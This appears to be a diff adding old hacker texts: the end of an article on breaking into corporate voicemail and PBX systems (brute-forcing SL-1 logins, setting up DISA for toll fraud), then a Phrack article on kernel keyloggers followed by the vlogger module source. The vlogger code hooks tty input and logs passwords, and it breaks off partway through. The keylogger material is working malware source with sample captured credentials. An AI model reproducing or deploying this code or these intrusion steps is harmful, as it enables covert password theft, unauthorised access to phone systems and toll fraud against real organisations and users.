+Almost all voice mail systems are a part of a switching system, but there
+are certain systems that are ONLY for voicemail. Let's say you have a big
+switching system of the Definity Series from AT&T. You can integrate a voice
+mail (in this case Audix) into your PBX System. You have the possibility to
+set up an extension to maintain your PBX, let's say your company owns
+645-xxxx. You can setup the dial-in port on extension 645-9999, and if
+you dial 645-9999, you will be connected to a terminal where you can setup
+or maintain the WHOLE PBX system. (Well I guess nothing new for you guys.)
+If you have a voicemail system, you can setup the dial-in port also to be
+reachable through your voicemail, so let's say you transfer to extension 9999
+and bingo, you get the carrier. This is very interesting, because it
+is a great possibilty to reach a switching system from outside a country
+trough a toll-free number. Audix voicemail e.g. is often integrated into
+the Definity Series (System 75 and 85; the G1 - G3 series), so the chance
+of finding a Sys75 on an Audix extension is quiete high. BUT I suggest that
+you give this up. Why? Because AT&T changed ALL default login's and password's
+due to a massive abuse in the States. I talked to a woman from Lucent on
+the CEBIT this year (she is in the toll-fraud prevention center), and she
+said that they still ship the Definity Series with the defaults, BUT their
+technicians are told to change them. You may try the looker/browser account
+but in general, you have no chance of entering the system easiely. Of course,
+social-engeneering is a possibility. You should concentrate on the switches
+from Nortel. (Sl-1 series etc.) A Meridian Voice Mail system is sometimes
+integrated into this PBX system, and the hacking is quiete easy.
+A SL-1 switch answers like this:
+OVL111 IDLE and has different signs on the screen like TTY and such.
+(Check the reference article; read the end of this file)
+To logon, you type LOGI and it responds with PASS?.
+The older SL-1 switch ONLY allows a 4 digit numeric code and you have
+UNLIMMITED tries, so fuck, write a script and you are in FAST!
+The newer one (sigh) allows 16? signs so give it up.
+Once in, you can setup DISA's and more ... remember, if you have access
+to a switching system, you can do ALL with their telephone system.
+(Even shut-down if you are malicious).
+You sould be abled to access a ROLM CBX system through Phonemail, but
+I never found this myself.
+
+7. End / Contact the author
+---------------------------
+I hope you found this article enjoyable to read and know, why to concern
+with VMB's now. Something I wanted to add: DON'T think you cannot hack
+those systems and their PBX systems, because most technicians are not
+half that intelligent as you are. The often chose simple passwords and
+left a backdoor open. I know it myself, because I'm a low-level technician
+of a German PBX system and the technician who installed the whole system
+was really stupid without any knowledge that got behind his manual.
+To maintain the system for me was really hard because of the bad setup.
+I'll write a file about German PBX systems later this year.
+(Octopus from Telekom, HiCOM from Siemens and 4000 series from Alcatel)
+BTW, use the WWW to gain good informations about anything! Use
+Lycos and you will get a lot of interesting pages with stuff for you,
+concerning VMB's and PBX systems.
+To contact me from within Germany, dial 0130-817698 and leave mail to
+extension 2389. From outside Germany, please call +1-510-624-7120 and
+leave me a voicemail. Or call LORE BBS in Germany to leave me a mail,
+or you can also ask any THC member how to reach me. And yes, I am
+on IRC sometimes, try to catch me in #bluebox.
+
+                                                    -WiLKiNS!
+
+8. Appendix
+-----------
+
+NOTE: These are ONLY the *best* textfiles I found about these VMB systems.
+      I didn't put a description of hacking tools for boxes in too, because
+      hacking boxes with tools is senseless once you have one valid box on
+      the system.
+
+General
+-------
+tao90-04.zip
+
+This file describes a lot of VMB systems and their features. Short-cut,
+but the best you can get! Written by (?) accidential tourist.
+
+Aspen
+-----
+aspen1.zip
+aspen2.zip
+
+Both files were written by CaveMan and are also distributed under caveasp.zip
+They give you a good overview about the commands and on how-to-hack.
+NOTE: The 3-digit-error is STILL found very often!
+
+Audix
+-----
+cotno01.zip
+audexvp.zip
+
+The article from DeadKat in the Cotno Mag #1 is about the hacking of Audix;
+the second one is from Crazybyte. It contains some mistakes but reading it
+is still worthwhile.
+
+Cindy
+-----
+cinditut.zip
+
+The Cindy system is not very common, but quiete nice.
+Article from Slycath.
+
+Meridian Voice Mail
+-------------------
+cotno04.zip
+mmail.zip
+
+Again, DeadKat brings us an excellent article in Cotno Mag #4. (He, please
+contact me if you read this!) The other one is from ColdFire and concerns
+about the setup of the voicemail system through the computer extension.
+
+ROLM CBX / Phonemail
+--------------------
+rolm-01.zip
+9x_rlmpn.zip
+
+The first article from OleBuzzard deals with the PBX system; the second
+one from Substance is on how to setup Phonemail through the dial-in port.
+
+SL-1
+----
+phrack44.zip
+
+The article from IceMan in Phrack #44 is a good article for beginners.
+It introduces the features of the SL-1 series and gives a command overview,
+but it doesnot explain enough on the programming. Where is the promised
+part 2? Nortel "secures" its systems with a variety of abbreviations, so
+you must have a manual or simply have to guess. Special Info: If you
+try something, and you want to cancel the commands, press **** and you
+will be back at the main screen.
+
+System 75
+---------
+cotno01.zip
+
+You see, Cotno is really a great mag. The article from Panther Modern is
+one of the best one's about System 75, and there are a lot of them.
+
+
+Greets,
+          WiLKiNS
+

Papers/writing-linux-kernel-keylogger.txt

@@ -0,0 +1,1651 @@
+
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x0e of 0x12
+
+
+|=-----------------=[ Writing Linux Kernel Keylogger ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ rd <rd@thc.org> ]=--------------------------=|
+|=------------------------=[ June 19th, 2002 ]=--------------------------=|
+
+--[ Contents
+
+ 1 - Introduction
+
+ 2 - How Linux keyboard driver work
+
+ 3 - Kernel based keylogger approaches
+   3.1 - Interrupt handler
+   3.2 - Function hijacking
+       3.2.1 - handle_scancode
+       3.2.2 - put_queue
+       3.2.3 - receive_buf
+       3.2.4 - tty_read
+       3.2.5 - sys_read/sys_write
+
+ 4 - vlogger
+   4.1 - The syscall/tty approach
+   4.2 - Features
+   4.3 - How to use
+
+ 5 - Greets
+
+ 6 - References
+
+ 7 - Keylogger source
+
+
+
+
+--[ 1 - Introduction
+
+  This article is divided into two parts.  The first part of the paper
+gives an overview on how the linux keyboard driver work, and discusses
+methods that can be used to create a kernel based keylogger.  This part
+will be useful for those who want to write a kernel based keylogger, or to
+write their own keyboard driver (for supporting input of non-supported
+language in linux environment, ...) or to program taking advantage of many
+features in the Linux keyboard driver.
+
+  The second part presents detail of vlogger, a smart kernel based linux
+keylogger, and how to use it.  Keylogger is a very interesting code being
+used widely in honeypots, hacked systems, ... by white and black hats.  As
+most of us known, besides user space keyloggers (such as iob, uberkey,
+unixkeylogger, ...), there are some kernel based keyloggers.  The earliest
+kernel based keylogger is linspy of halflife which was published in Phrack
+50 (see [4]).  And the recent kkeylogger is presented in 'Kernel Based
+Keylogger' paper by mercenary (see [7]) that I found when was writing this
+paper.  The common method of those kernel based keyloggers using is to log
+user keystrokes by intercepting sys_read or sys_write system call.
+However, this approach is quite unstable and slowing down the whole system
+noticeably because sys_read (or sys_write) is the generic read/write
+function of the system; sys_read is called whenever a process wants to read
+something from devices (such as keyboard, file, serial port, ...).  In
+vlogger, I used a better way to implement it that hijacks the tty buffer
+processing function.
+
+  The reader is supposed to possess the knowledge on Linux Loadable Kernel
+Module.  Articles [1] and [2] are recommended to read before further
+reading.
+
+
+--[ 2 - How Linux keyboard driver work
+
+  Lets take a look at below figure to know how user inputs from console
+keyboard are processed:
+
+  _____________            _________             _________         
+ /             \ put_queue|         |receive_buf|         |tty_read
+/handle_scancode\-------->|tty_queue|---------->|tty_ldisc|------->
+\               /         |         |           |buffer   |        
+ \_____________/          |_________|           |_________|        
+
+     _________          ____________
+    |         |sys_read|            |
+--->|/dev/ttyX|------->|user process|
+    |         |        |            |
+    |_________|        |____________|
+
+
+                            Figure 1
+
+  First, when you press a key on the keyboard, the keyboard will send
+corresponding scancodes to keyboard driver.  A single key press can produce
+a sequence of up to six scancodes.
+
+  The handle_scancode() function in the keyboard driver parses the stream
+of scancodes and converts it into a series of key press and key release
+events called keycode by using a translation-table via kbd_translate()
+function.  Each key is provided with a unique keycode k in the range 1-127.
+Pressing key k produces keycode k, while releasing it produces keycode
+k+128. 
+
+  For example, keycode of 'a' is 30. Pressing key 'a' produces keycode 30.
+Releasing 'a' produces keycode 158 (128+30).
+
+  Next, keycodes are converted to key symbols by looking them up on the
+appropriate keymap.  This is a quite complex process. There are eight
+possible modifiers (shift keys - Shift , AltGr, Control, Alt, ShiftL,
+ShiftR, CtrlL and CtrlR), and the combination of currently active modifiers
+and locks determines the keymap used.
+
+  After the above handling, the obtained characters are put into the raw
+tty queue - tty_flip_buffer.
+
+  In the tty line discipline, receive_buf() function is called periodically
+to get characters from tty_flip_buffer then put them into tty read queue.
+
+  When user process want to get user input, it calls read() function on
+stdin of the process. sys_read() function will calls read() function
+defined in file_operations structure (which is pointed to tty_read) of
+corresponding tty (ex /dev/tty0) to read input characters and return to the
+process.
+
+  The keyboard driver can be in one of 4 modes:
+	- scancode (RAW MODE): the application gets scancodes for input.  
+	It is used by applications that implement their own keyboard 
+	driver (ex: X11)
+
+	- keycode (MEDIUMRAW MODE): the application gets information on
+	which keys (identified by their keycodes) get pressed and 
+	released.
+
+	- ASCII (XLATE MODE): the application effectively gets the 
+	characters as defined by the keymap, using an 8-bit encoding.
+
+	- Unicode (UNICODE MODE): this mode only differs from the ASCII 
+	mode by allowing the user to compose UTF8 unicode characters by 
+	their decimal value, using Ascii_0 to Ascii_9, or their 
+	hexadecimal (4-digit) value, using Hex_0 to Hex_9.  A keymap can 
+	be set up to produce UTF8 sequences (with a U+XXXX pseudo-symbol, 
+	where each X is an hexadecimal digit). 
+
+  Those modes influence what type of data that applications will get as
+keyboard input.  For more details on scancode, keycode and keymaps, please
+read [3].
+
+
+--[ 3 - Kernel based keylogger approaches
+
+  We can implement a kernel based keylogger in two ways by writing our own
+keyboard interrupt handler or hijacking one of input processing functions. 
+
+
+----[ 3.1 - Interrupt handler
+
+  To log keystrokes, we will use our own keyboard interrupt handler.  Under
+Intel architectures, the IRQ of the keyboard controlled is IRQ 1.  When
+receives a keyboard interrupt, our own keyboard interrupt handler read the
+scancode and keyboard status.  Keyboard events can be read and written via
+port 0x60(Keyboard data register) and 0x64(Keyboard status register).
+
+/* below code is intel specific */
+#define KEYBOARD_IRQ 1 
+#define KBD_STATUS_REG 0x64 
+#define KBD_CNTL_REG 0x64 
+#define KBD_DATA_REG 0x60 
+
+#define kbd_read_input() inb(KBD_DATA_REG) 
+#define kbd_read_status() inb(KBD_STATUS_REG) 
+#define kbd_write_output(val) outb(val, KBD_DATA_REG) 
+#define kbd_write_command(val) outb(val, KBD_CNTL_REG) 
+
+/* register our own IRQ handler */
+request_irq(KEYBOARD_IRQ, my_keyboard_irq_handler, 0, "my keyboard", NULL);
+
+In my_keyboard_irq_handler():
+	scancode = kbd_read_input(); 
+	key_status = kbd_read_status(); 
+	log_scancode(scancode);
+
+  This method is platform dependent.  So it won't be portable among
+platforms.  And you have to be very careful with your interrupt handler if
+you don't want to crash your box ;)
+
+
+----[ 3.2 - Function hijacking
+
+   Based on the Figure 1, we can implement our keylogger to log user inputs
+by hijacking one of handle_scancode(), put_queue(), receive_buf(),
+tty_read() and sys_read() functions.  Note that we can't intercept
+tty_insert_flip_char() function because it is an INLINE function.
+
+
+------[ 3.2.1 - handle_scancode
+
+  This is the entry function of the keyboard driver (see keyboard.c).  It
+handles scancodes which are received from keyboard.
+
+# /usr/src/linux/drives/char/keyboard.c
+void handle_scancode(unsigned char scancode, int down);
+
+  We can replace original handle_scancode() function with our own to logs
+all scancodes.  But handle_scancode() function is not a global and exported
+function.  So to do this, we can use kernel function hijacking technique
+introduced by Silvio (see [5]).
+
+/* below is a code snippet written by Plasmoid */
+static struct semaphore hs_sem, log_sem;
+static int logging=1;
+
+#define CODESIZE 7
+static char hs_code[CODESIZE];
+static char hs_jump[CODESIZE] =
+       "\xb8\x00\x00\x00\x00"      /*      movl   $0,%eax  */
+       "\xff\xe0"                  /*      jmp    *%eax    */
+   ;
+
+void (*handle_scancode) (unsigned char, int) =
+        (void (*)(unsigned char, int)) HS_ADDRESS;
+
+void _handle_scancode(unsigned char scancode, int keydown)
+{
+       if (logging && keydown)
+          log_scancode(scancode, LOGFILE);
+    
+       /*
+        * Restore first bytes of the original handle_scancode code.  Call
+        * the restored function and re-restore the jump code.  Code is
+        * protected by semaphore hs_sem, we only want one CPU in here at a
+        * time.
+        */     
+       down(&hs_sem);
+    
+       memcpy(handle_scancode, hs_code, CODESIZE);
+       handle_scancode(scancode, keydown);
+       memcpy(handle_scancode, hs_jump, CODESIZE);
+    
+       up(&hs_sem);
+}
+
+HS_ADDRESS is set by the Makefile executing this command
+HS_ADDRESS=0x$(word 1,$(shell ksyms -a | grep handle_scancode))
+
+  Similar to method presented in 3.1, the advantage of this method is the
+ability to log keystrokes under X and the console, no matter if a tty is
+invoked or not.  And you will know exactly what key is pressed on the
+keyboard (including special keys such as Control, Alt, Shift, Print Screen,
+...).  But this method is platform dependent and won't be portable among
+platforms.  This method also can't log keystroke of remote sessions and is
+quite complex for building an advance logger.
+
+
+------[ 3.2.2 - put_queue
+
+  This function is called by handle_scancode() function to put characters
+into tty_queue. 
+
+# /usr/src/linux/drives/char/keyboard.c
+void put_queue(int ch);
+ 
+  To intercept this function, we can use the above technique as in section
+(3.2.1).
+
+
+------[ 3.2.3 - receive_buf
+
+  receive_buf() function is called by the low-level tty driver to send
+characters received by the hardware to the line discipline for processing.
+
+# /usr/src/linux/drivers/char/n_tty.c */
+static void n_tty_receive_buf(struct tty_struct *tty, const 
+				unsigned char *cp, char *fp, int count)
+
+cp is a pointer to the buffer of input character received by the device.
+fp is a pointer to a pointer of flag bytes which indicate whether a
+character was received with a parity error, etc.
+
+Lets take a deeper look into tty structures
+
+# /usr/include/linux/tty.h
+struct tty_struct {
+	int	magic;
+	struct tty_driver driver;
+	struct tty_ldisc ldisc;
+	struct termios *termios, *termios_locked;
+	...
+}
+
+# /usr/include/linux/tty_ldisc.h
+struct tty_ldisc {
+	int	magic;
+	char	*name;
+	...	
+	void	(*receive_buf)(struct tty_struct *, 
+			const unsigned char *cp, char *fp, int count);
+	int	(*receive_room)(struct tty_struct *);
+	void	(*write_wakeup)(struct tty_struct *);
+};
+
+  To intercept this function, we can save the original tty receive_buf()
+function then set ldisc.receive_buf to our own new_receive_buf() function
+in order to logging user inputs. 
+
+Ex: to log inputs on the tty0
+
+int fd = open("/dev/tty0", O_RDONLY, 0);
+struct file *file = fget(fd);
+struct tty_struct *tty = file->private_data;
+old_receive_buf = tty->ldisc.receive_buf;
+tty->ldisc.receive_buf = new_receive_buf;
+
+void new_receive_buf(struct tty_struct *tty, const unsigned char *cp, 
+						char *fp, int count)
+{	
+	logging(tty, cp, count); 	//log inputs
+
+	/* call the original receive_buf */
+	(*old_receive_buf)(tty, cp, fp, count);
+}
+
+
+------[ 3.2.4 - tty_read
+
+  This function is called when a process wants to read input characters
+from a tty via sys_read() function.
+
+# /usr/src/linux/drives/char/tty_io.c
+static ssize_t tty_read(struct file * file, char * buf, size_t count, 
+				loff_t *ppos)
+
+static struct file_operations tty_fops = {
+	llseek:		tty_lseek,
+	read:		tty_read,
+	write:		tty_write,
+	poll:		tty_poll,
+	ioctl:		tty_ioctl,
+	open:		tty_open,
+	release:	tty_release,
+	fasync:		tty_fasync,
+};
+
+To log inputs on the tty0:
+
+int fd = open("/dev/tty0", O_RDONLY, 0);
+struct file *file = fget(fd);	
+old_tty_read = file->f_op->read;
+file->f_op->read = new_tty_read;
+
+
+------[ 3.2.5 - sys_read/sys_write
+
+  We will intercept sys_read/sys_write system calls to redirect it to our
+own code which logs the content of the read/write calls.  This method was
+presented by halflife in Phrack 50 (see [4]).  I highly recommend reading
+that paper and a great article written by pragmatic called "Complete Linux
+Loadable Kernel Modules" (see [2]).
+
+The code to intercept sys_read/sys_write will be something like this:
+
+extern void *sys_call_table[];
+original_sys_read = sys_call_table[__NR_read];
+sys_call_table[__NR_read] = new_sys_read;
+
+
+--[ 4 - vlogger
+
+  This part will introduce my kernel keylogger which is used method
+described in section 3.2.3 to acquire more abilities than common keyloggers
+used sys_read/sys_write systemcall replacement approach.  I have tested the
+code with the following versions of linux kernel: 2.4.5, 2.4.7, 2.4.17 and
+2.4.18. 
+
+
+----[ 4.1 - The syscall/tty approach
+
+  To logging both local (logged from console) and remote sessions, I chose
+the method of intercepting receive_buf() function (see 3.2.3).
+
+  In the kernel, tty_struct and tty_queue structures are dynamically
+allocated only when the tty is open.  Thus, we also have to intercept
+sys_open syscall to dynamically hooking the receive_buf() function of each
+tty or pty when it's invoked.
+
+// to intercept open syscall
+original_sys_open = sys_call_table[__NR_open];
+sys_call_table[__NR_open] = new_sys_open;
+
+// new_sys_open()
+asmlinkage int new_sys_open(const char *filename, int flags, int mode)
+{
+...
+	// call the original_sys_open
+	ret = (*original_sys_open)(filename, flags, mode);
+	
+	if (ret >= 0) {
+		struct tty_struct * tty;
+...
+		file = fget(ret);
+		tty = file->private_data;
+		if (tty != NULL && 
+...
+			tty->ldisc.receive_buf != new_receive_buf) {
+...
+				// save the old receive_buf			
+				old_receive_buf = tty->ldisc.receive_buf;
+...
+
+		       /* 
+		        * init to intercept receive_buf of this tty
+		        * tty->ldisc.receive_buf = new_receive_buf;
+		        */
+			init_tty(tty, TTY_INDEX(tty));
+		}
+...
+}
+
+// our new receive_buf() function
+void new_receive_buf(struct tty_struct *tty, const unsigned char *cp, 
+						char *fp, int count)
+{
+	if (!tty->real_raw && !tty->raw)	// ignore raw mode
+		// call our logging function to log user inputs 
+		vlogger_process(tty, cp, count); 
+	// call the original receive_buf
+	(*old_receive_buf)(tty, cp, fp, count);
+}
+
+
+----[ 4.2 - Features
+
+  - Logs both local and remote sessions (via tty & pts)
+
+  - Separate logging for each tty/session.  Each tty has their own logging
+    buffer.
+
+  - Nearly support all special chars such as arrow keys (left, right, up,
+    down), F1 to F12, Shift+F1 to Shift+F12, Tab, Insert, Delete, End,
+    Home, Page Up, Page Down, BackSpace, ... 
+
+  - Support some line editing keys included CTRL-U and BackSpace.
+
+  - Timestamps logging, timezone supported (ripped off some codes from
+    libc).
+
+  - Multiple logging modes
+
+	o dumb mode: logs all keystrokes
+
+	o smart mode: detects password prompt automatically to log
+	user/password only.  I used the similar technique presented in
+	"Passive Analysis of SSH (Secure Shell) Traffic" paper by Solar
+	Designer and Dug Song (see [6]).  When the application turns input
+	echoing off, we assume that it is for entering a password.
+
+	o normal mode: disable logging
+
+You can switch between logging modes by using a magic password.
+
+#define VK_TOGLE_CHAR	29	// CTRL-]
+#define MAGIC_PASS	"31337"	// to switch mode, type MAGIC_PASS 
+				// then press VK_TOGLE_CHAR key
+
+----[ 4.3 - How to use
+
+Change the following options
+
+// directory to store log files
+#define LOG_DIR "/tmp/log"
+
+// your local timezone
+#define TIMEZONE	7*60*60	// GMT+7
+
+// your magic password
+#define MAGIC_PASS	"31337" 
+
+Below is how the log file looks like:
+
+[root@localhost log]# ls -l
+total 60
+-rw-------    1 root     root          633 Jun 19 20:59 pass.log
+-rw-------    1 root     root        37593 Jun 19 18:51 pts11
+-rw-------    1 root     root           56 Jun 19 19:00 pts20
+-rw-------    1 root     root          746 Jun 19 20:06 pts26
+-rw-------    1 root     root          116 Jun 19 19:57 pts29
+-rw-------    1 root     root         3219 Jun 19 21:30 tty1
+-rw-------    1 root     root        18028 Jun 19 20:54 tty2
+
+---in dumb mode
+[root@localhost log]# head tty2		// local session
+<19/06/2002-20:53:47 uid=501 bash> pwd
+<19/06/2002-20:53:51 uid=501 bash> uname -a
+<19/06/2002-20:53:53 uid=501 bash> lsmod
+<19/06/2002-20:53:56 uid=501 bash> pwd
+<19/06/2002-20:54:05 uid=501 bash> cd /var/log
+<19/06/2002-20:54:13 uid=501 bash> tail messages
+<19/06/2002-20:54:21 uid=501 bash> cd ~
+<19/06/2002-20:54:22 uid=501 bash> ls
+<19/06/2002-20:54:29 uid=501 bash> tty
+<19/06/2002-20:54:29 uid=501 bash> [UP]
+
+[root@localhost log]# tail pts11	// remote session  
+<19/06/2002-18:48:27 uid=0 bash> cd new
+<19/06/2002-18:48:28 uid=0 bash> cp -p ~/code .
+<19/06/2002-18:48:21 uid=0 bash> lsmod
+<19/06/2002-18:48:27 uid=0 bash> cd /va[TAB][^H][^H]tmp/log/
+<19/06/2002-18:48:28 uid=0 bash> ls -l
+<19/06/2002-18:48:30 uid=0 bash> tail pts11
+<19/06/2002-18:48:38 uid=0 bash> [UP] | more
+<19/06/2002-18:50:44 uid=0 bash> vi vlogertxt
+<19/06/2002-18:50:48 uid=0 vi> :q
+<19/06/2002-18:51:14 uid=0 bash> rmmod vlogger
+
+---in smart mode
+[root@localhost log]# cat pass.log
+[19/06/2002-18:28:05 tty=pts/20 uid=501 sudo]
+USER/CMD sudo traceroute yahoo.com
+PASS 5hgt6d
+PASS 
+
+[19/06/2002-19:59:15 tty=pts/26 uid=0 ssh]
+USER/CMD ssh guest@host.com
+PASS guest
+
+[19/06/2002-20:50:44 tty=pts/29 uid=504 ftp]
+USER/CMD open ftp.ilog.fr
+USER Anonymous
+PASS heh@heh
+
+[19/06/2002-20:59:54 tty=pts/29 uid=504 su]
+USER/CMD su -
+PASS asdf1234
+
+
+Please check http://www.thc.org/ for update on the new version
+of this tool.
+
+
+--[ 5 - Greets  
+
+Thanks to plasmoid, skyper for your very useful comments
+Greets to THC, vnsecurity and all friends
+Finally, thanks to mr. thang for english corrections
+
+
+--[ 6 - References
+
+[1] Linux Kernel Module Programming
+    http://www.tldp.org/LDP/lkmpg/
+[2] Complete Linux Loadable Kernel Modules - Pragmatic
+    http://www.thc.org/papers/LKM_HACKING.html
+[3] The Linux keyboard driver - Andries Brouwer
+    http://www.linuxjournal.com/lj-issues/issue14/1080.html
+[4] Abuse of the Linux Kernel for Fun and Profit - Halflife
+    http://www.phrack.com/phrack/50/P50-05
+[5] Kernel function hijacking - Silvio Cesare
+    http://www.big.net.au/~silvio/kernel-hijack.txt
+[6] Passive Analysis of SSH (Secure Shell) Traffic - Solar Designer 
+    http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt
+[7] Kernel Based Keylogger - Mercenary
+    http://packetstorm.decepticons.org/UNIX/security/kernel.keylogger.txt
+
+--[ 7 - Keylogger sources
+
+<++> vlogger/Makefile
+#
+#  vlogger 1.0 by rd
+#
+#  LOCAL_ONLY		logging local session only. Doesn't intercept
+#			sys_open system call
+#  DEBUG		Enable debug. Turn on this options will slow
+#			down your system
+#
+
+KERNELDIR =/usr/src/linux
+include $(KERNELDIR)/.config
+MODVERFILE = $(KERNELDIR)/include/linux/modversions.h
+
+MODDEFS = -D__KERNEL__ -DMODULE -DMODVERSIONS
+CFLAGS = -Wall -O2 -I$(KERNELDIR)/include -include $(MODVERFILE) \
+	-Wstrict-prototypes -fomit-frame-pointer -pipe \
+	-fno-strength-reduce -malign-loops=2 -malign-jumps=2 \
+	-malign-functions=2
+
+all : vlogger.o
+
+vlogger.o: vlogger.c
+	$(CC) $(CFLAGS) $(MODDEFS) -c $^ -o $@
+
+clean:
+	rm -f *.o
+<-->
+<++> vlogger/vlogger.c
+/*
+ *  vlogger 1.0
+ *
+ *  Copyright (C) 2002 rd <rd@vnsecurity.net>
+ *
+ *  Please check http://www.thc.org/ for update
+ *
+ *  This program is free software; you can redistribute it and/or modify
+ *  it under the terms of the GNU General Public License as published by
+ *  the Free Software Foundation; either version 2 of the License, or
+ *  (at your option) any later version
+ *
+ *  This program is distributed in the hope that it will be useful, but 
+ *  WITHOUT ANY WARRANTY; without even the implied warranty of
+ *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU 
+ *  General Public License for more details.
+ *
+ *  Greets to THC & vnsecurity
+ *
+ */
+
+#define __KERNEL_SYSCALLS__
+#include <linux/version.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/smp_lock.h>
+#include <linux/sched.h>
+#include <linux/unistd.h>
+#include <linux/string.h>
+#include <linux/file.h>
+#include <asm/uaccess.h>
+#include <linux/proc_fs.h>
+#include <asm/errno.h>
+#include <asm/io.h>
+
+#ifndef KERNEL_VERSION
+#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
+#endif
+
+#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("rd@vnsecurity.net");
+#endif
+
+#define MODULE_NAME "vlogger "
+#define MVERSION "vlogger 1.0 - by rd@vnsecurity.net\n"
+
+#ifdef DEBUG
+#define DPRINT(format, args...) printk(MODULE_NAME format, ##args)
+#else
+#define DPRINT(format, args...)
+#endif
+
+#define N_TTY_NAME "tty"
+#define N_PTS_NAME "pts"
+#define MAX_TTY_CON 8
+#define MAX_PTS_CON 256
+#define LOG_DIR "/tmp/log"
+#define PASS_LOG LOG_DIR "/pass.log"
+
+#define TIMEZONE 7*60*60	// GMT+7
+
+#define ESC_CHAR 27
+#define BACK_SPACE_CHAR1 127	// local
+#define BACK_SPACE_CHAR2 8	// remote
+
+#define VK_TOGLE_CHAR 29	// CTRL-]
+#define MAGIC_PASS "31337" 	// to switch mode, press MAGIC_PASS and 
+				// VK_TOGLE_CHAR
+
+#define	VK_NORMAL 0
+#define	VK_DUMBMODE 1
+#define	VK_SMARTMODE 2
+#define DEFAULT_MODE VK_DUMBMODE
+
+#define MAX_BUFFER 256
+#define MAX_SPECIAL_CHAR_SZ 12
+
+#define TTY_NUMBER(tty) MINOR((tty)->device) - (tty)->driver.minor_start \
+			+ (tty)->driver.name_base
+#define TTY_INDEX(tty) tty->driver.type == \
+			TTY_DRIVER_TYPE_PTY?MAX_TTY_CON + \
+			TTY_NUMBER(tty):TTY_NUMBER(tty)
+#define IS_PASSWD(tty) L_ICANON(tty) && !L_ECHO(tty)
+#define TTY_WRITE(tty, buf, count) (*tty->driver.write)(tty, 0, \
+							buf, count)
+
+#define TTY_NAME(tty) (tty->driver.type == \
+		TTY_DRIVER_TYPE_CONSOLE?N_TTY_NAME: \
+		tty->driver.type == TTY_DRIVER_TYPE_PTY && \
+		tty->driver.subtype == PTY_TYPE_SLAVE?N_PTS_NAME:"")
+
+#define BEGIN_KMEM { mm_segment_t old_fs = get_fs(); set_fs(get_ds());
+#define END_KMEM set_fs(old_fs); }
+
+extern void *sys_call_table[];
+int errno;
+
+struct tlogger {
+	struct tty_struct *tty;
+	char buf[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ];
+	int lastpos;
+	int status;
+	int pass;
+};
+
+struct tlogger *ttys[MAX_TTY_CON + MAX_PTS_CON] = { NULL };
+void (*old_receive_buf)(struct tty_struct *, const unsigned char *,
+			char *, int);
+asmlinkage int (*original_sys_open)(const char *, int, int);
+
+int vlogger_mode = DEFAULT_MODE;
+
+/* Prototypes */
+static inline void init_tty(struct tty_struct *, int);
+
+/*
+static char *_tty_make_name(struct tty_struct *tty, 
+				const char *name, char *buf)
+{
+	int idx = (tty)?MINOR(tty->device) - tty->driver.minor_start:0;
+
+	if (!tty) 
+		strcpy(buf, "NULL tty");
+	else
+		sprintf(buf, name,
+			idx + tty->driver.name_base);
+	return buf;
+}
+
+char *tty_name(struct tty_struct *tty, char *buf)
+{
+	return _tty_make_name(tty, (tty)?tty->driver.name:NULL, buf);
+}
+*/
+
+#define SECS_PER_HOUR   (60 * 60)
+#define SECS_PER_DAY    (SECS_PER_HOUR * 24)
+#define isleap(year) \
+	((year) % 4 == 0 && ((year) % 100 != 0 || (year) % 400 == 0))
+#define DIV(a, b) ((a) / (b) - ((a) % (b) < 0))
+#define LEAPS_THRU_END_OF(y) (DIV (y, 4) - DIV (y, 100) + DIV (y, 400))
+
+struct vtm {
+	int tm_sec;
+	int tm_min;
+	int tm_hour;
+	int tm_mday;
+	int tm_mon;
+	int tm_year;
+};
+
+
+/* 
+ *  Convert from epoch to date 
+ */
+ 
+int epoch2time (const time_t *t, long int offset, struct vtm *tp)
+{
+	static const unsigned short int mon_yday[2][13] = {
+	   /* Normal years.  */
+	   { 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365 },
+	   /* Leap years.  */
+	   { 0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 366 }
+	};
+
+	long int days, rem, y;
+	const unsigned short int *ip;
+
+	days = *t / SECS_PER_DAY;
+	rem = *t % SECS_PER_DAY;
+	rem += offset;
+	while (rem < 0) { 
+		rem += SECS_PER_DAY;
+		--days;
+	}
+	while (rem >= SECS_PER_DAY) {
+		rem -= SECS_PER_DAY;
+		++days;
+	}
+	tp->tm_hour = rem / SECS_PER_HOUR;
+	rem %= SECS_PER_HOUR;
+	tp->tm_min = rem / 60;
+	tp->tm_sec = rem % 60;
+	y = 1970;
+
+	while (days < 0 || days >= (isleap (y) ? 366 : 365)) {
+		long int yg = y + days / 365 - (days % 365 < 0);
+		days -= ((yg - y) * 365
+			+ LEAPS_THRU_END_OF (yg - 1)
+			- LEAPS_THRU_END_OF (y - 1));
+		y = yg;
+	}
+	tp->tm_year = y - 1900;
+	if (tp->tm_year != y - 1900)
+		return 0;
+	ip = mon_yday[isleap(y)];
+	for (y = 11; days < (long int) ip[y]; --y)
+		continue;
+	days -= ip[y];
+	tp->tm_mon = y;
+	tp->tm_mday = days + 1;
+	return 1;
+}
+
+
+/* 
+ *  Get current date & time
+ */
+
+void get_time (char *date_time) 
+{
+	struct timeval tv;
+	time_t t;
+	struct vtm tm;
+	
+	do_gettimeofday(&tv);
+        t = (time_t)tv.tv_sec;
+	
+	epoch2time(&t, TIMEZONE, &tm);
+
+	sprintf(date_time, "%.2d/%.2d/%d-%.2d:%.2d:%.2d", tm.tm_mday,
+		tm.tm_mon + 1, tm.tm_year + 1900, tm.tm_hour, tm.tm_min,
+		tm.tm_sec);
+}
+
+
+/* 
+ * Get task structure from pgrp id
+ */
+
+inline struct task_struct *get_task(pid_t pgrp) 
+{
+	struct task_struct *task = current;
+
+        do {
+                if (task->pgrp == pgrp) {
+                        return task;
+                }
+                task = task->next_task;
+        } while (task != current);
+        return NULL;
+}
+
+
+#define _write(f, buf, sz) (f->f_op->write(f, buf, sz, &f->f_pos))
